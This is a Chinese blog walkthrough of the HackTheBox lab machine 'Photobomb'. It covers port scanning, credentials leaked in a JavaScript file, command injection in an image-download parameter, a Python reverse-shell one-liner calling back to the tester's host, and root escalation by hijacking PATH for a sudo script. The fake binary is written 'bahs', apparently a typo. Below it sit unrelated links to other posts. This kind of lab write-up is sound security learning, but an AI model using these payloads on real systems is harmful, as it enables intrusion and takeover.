HackTheBox-Machines--Photobomb

于 2023-12-28 11:53:53 发布
阅读量478 收藏 9
点赞数 10
分类专栏: 靶场集合 # HACK THE BOX 文章标签: Hack The Box 代码审计 命令执行
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sycamorelg/article/details/135243760
版权

文章目录

Photobomb 测试过程

1 端口扫描

nmap -sC -sV 10.129.57.210

在这里插入图片描述

2 测试思路

  目标开启了22、80端口,所以测试点还是从80端口开始。
针对80端口的测试:
  1.目录扫描
  2.网页源代码
  3.web漏洞

3 Web漏洞探测

echo "10.129.57.210 photobomb.htb" | sudo tee -a /etc/hosts

在这里插入图片描述

  1.查看网页源代码

在这里插入图片描述

  2.在网页源代码中,发现 photobomb.js/printer 两个路径。点击 /printer 跳转到认证页面 http://photobomb.htb/printer
在这里插入图片描述

  3.点击 photobomb.js 查看js代码,发现在代码中存在链接http://pH0t0:b0Mb!@photobomb.htb/printer,访问该链接,成功绕过身份验证进入登录后页面,并且在该链接中存在登录的用户名和密码:pH0t0:b0Mb!

在这里插入图片描述
在这里插入图片描述

  4.使用获取到的pH0t0:b0Mb!登录,并抓取下载图片的请求包

在这里插入图片描述

  5.图片的下载是POST请求,可以尝试对参数进行命令注入测试

payload:;id

在这里插入图片描述

  6.响应包没有返回有用的输出,利用是否返回ICMP报文观察请求命令是否执行

ping -c 3 10.10.14.6

在这里插入图片描述

在这里插入图片描述

  7.成功获得ICMP报文,证明漏洞存在,对payload进行url编码进行反弹shell

# payload
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.6",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'

在这里插入图片描述

在这里插入图片描述

 python3 -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述

4 权限提升

sudo -l

在这里插入图片描述

  输出(root) SETENV: NOPASSWD: /opt/cleanup.sh,输出显示web用户可以使用root权限执行 /opt/cleanup.sh脚本

cat /opt/cleanup.sh

在这里插入图片描述

  在cleanup.sh脚本中,$PATH的查找名为find,在find中写入实例bash,然后以root权限运行cleanup.sh文件,成功获取到root权限

echo bahs > find
chmod +x find 
sudo PATH=$PWD:$PATH /opt/cleanup.sh

在这里插入图片描述

HTB HARD 靶机 Cerberus WriteUp
qq_58869808的博客
03-26 8301
HTB Cerberus hard!!!靶机writeUp
HackTheBox Photobomb 命令注入与远程代码执行和环境变量提权
Ba1_Ma0的博客
11-07 2247
最关键的地方就是最后一行的这个命令,他find使用的是相对路径,而不是绝对路径,也就是说,我们改变一下环境变量,然后在当前目录创建一个find文件,里面写一个shell,之后用sudo执行的时候,就能直接获得root权限。然后就是常规的枚举网站子域名,网站目录,查找网站框架的漏洞什么的,这些我都做了,但是没什么突破点,只能去网页上看看了。登录后可以下载一些图片,然后就没其他的了,我们使用burp抓一下下载的包。这个文件是刚刚登录框的js文件,这里应该是账号和密码,然后返回登录。成功获得root权限。
HTB-Photobomb
TA不懒,但还没有添加简介
02-24 680
HTB-Photobomb
《网络安全0-100》Hack The Box [HTB] : Photobomb
一只正的博客
07-28 195
用nmap、dirsearch进行信息收集,发现开放22,80端口,一个矢量图标和printer目录。最开始我注意的是nginx,在网上搜索该版本漏洞后发现能使用的只有一个路径穿越漏洞/file../,且并未泄露有效信息。查看当前可执行文件cleanup.sh,该文件类型为bash脚本,从文件最后一行中得出,find使用的相对路径,并非绝对路径,那我们在find文件中写入恶意代码,改变当前环境即可获取权限。访问printer目录,是一个登录框,尝试admin123等弱密码无果后放弃。
No.2-Wall-难度普通-HTB-walkthrough
weixin_43851945的博客
01-13 623
No.2-Wall-难度普通-HTB-walkthrough ** 这台机器比较有意思,正如名字 有一道“墙”。有趣的是这台机器的CMS CVE和机器的作者是同一个人。很多人有了POC就忽略了看 ** 攻击机:官方Kali linux 2019 64位 作者:Ikonw 靶机介绍 ...
oracle 月份是英文,月份单词怎么写
weixin_35252979的博客
04-08 439
来源:新东方网作者:朱博As the English language evolves, so does the dictionary. Every year new words appear as people find creative ways to describe the changing world around us. Some of them fade away rapidly, ...
Day 17 New words AND Used to
carlosyu的博客
12-12 469
1.New words flashmob (noun) a crowd of people who gather together quickly and suddenly, often organised through social media selfie (noun) a photo that you take of yourself, normally on a mobile phone...
English Learn 4
liu903265的专栏
02-16 514
English Learn 4 本来是计划每天上班能利用中午休息后的一点点时间学习下英语,且在这里做个小小的记录。但是很多时候没有去记,不知道为什么没有坚持下来。还是希望自己能继续记录,继续坚持把。 2016/2/16 English Today If you can’t win, lose like a champion. Word Card cross the line 过分,越界
AVFoundation 视频常用套路: 拍照聚焦、曝光、闪光灯,拍视频手电筒
chuying2618的博客
10-29 8598
看图可知, AVFoundation 拍照功能的中心类是 AVCaptureSession 类,管理视频输入输出流。 音视频,上手就用,直接 AVKit 更加灵活的控制,就用到 AVFoundation 要点: 使用资源(一般就是照片库里面的视频,图片,live photo ), 播放,...
electron-photobomb:这是一个使用ElectronJS的简单项目,允许用户拍摄可自定义的自拍照片。 用户可以从可用的照片滤镜中进行选择,以使自拍照更加有趣。 这是基于Pluralsight ElectronJS课程
05-13
"electron-photobomb" 是一个基于 ElectronJS 开发的应用程序,它的主要功能是让用户能够拍摄自定义的自拍照片,并且提供了照片滤镜功能,为自拍照增添趣味性。这个项目源于 Pluralsight 的一个 ElectronJS 课程,...
photobomb:庆祝和寻找非洲艺术
04-03
$ cd photobomb && virtualenv venv the-name # source venv by running 'source ./photobomb/Scripts/activate' $ # install dependencies $ pip install -r requirements.txt $ # Run local dev server $ cd ...
photobomb:预算时间短
05-04
炸弹! 一次从多台相机拍摄照片。 大事记 晚上7点-v0.1-最低可行的Whizzbang 使用网络摄像头或手机摄像头捕获照片 第一次按下按钮会触发所有相机上的照片 照片存储在数据库中 在每个屏幕上播放 ...
绿色柔性导电水凝胶的构建及其在运动健康监测中的应用
11-11
绿色柔性导电水凝胶的构建及其在运动健康监测中的应用
com.harmonyos4.exception.GpsUnavailableException解决方案(亲测可用).md
11-11
鸿蒙开发中碰到的报错,问题已解决,写个文档记录一下这个问题及解决方案
21124412马俊东 LSTM模型 (1).ipynb
11-11
21124412马俊东 LSTM模型 (1).ipynb
python+基于LDA的情感分析项目+自然语言处理
最新发布
11-11
python+基于LDA的情感分析项目+自然语言处理
AGV调度模型设计《AGV小车负责完成集装箱从各自起点岸桥送到指定终点场桥》+项目源码+文档说明
11-11
<项目介绍> - 模型最终需求 所有任务完成的总时间;每个小车从开始任务到它最后一个任务的时间;每个小车完成多少个任务;每个小车充电的时间;每个小车等待充电的 时间;每个小车行走的距离 任务: 码头的工作区域内,AGV小车负责完成集装箱从各自起点岸桥送到指定终点场桥。 对应关系: 一个集装箱任务对应一个起点岸桥和一个终点场桥。 - 不懂运行,下载完可以私聊问,可远程教学 1、该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的,请放心下载使用! 2、本项目适合计算机相关专业(如计科、人工智能、通信工程、自动化、电子信息等)的在校学生、老师或者企业员工下载学习,也适合小白学习进阶,当然也可作为毕设项目、课程设计、作业、项目初期立项演示等。 3、如果基础还行,也可在此代码基础上进行修改,以实现其他功能,也可用于毕设、课设、作业等。 下载后请首先打开README.md文件(如有),仅供学习参考, 切勿用于商业用途。 --------
qt5.9.5-imx6
11-11
qt5.9.5-imx6
com.harmonyos4.exception.ApplicationThrottlingException.md
11-11
鸿蒙开发中碰到的报错,问题已解决,写个文档记录一下这个问题及解决方案
com.harmonyos4.exception.ScalabilityLimitationException.md
11-11
鸿蒙开发中碰到的报错,问题已解决,写个文档记录一下这个问题及解决方案
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

李沉肩

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值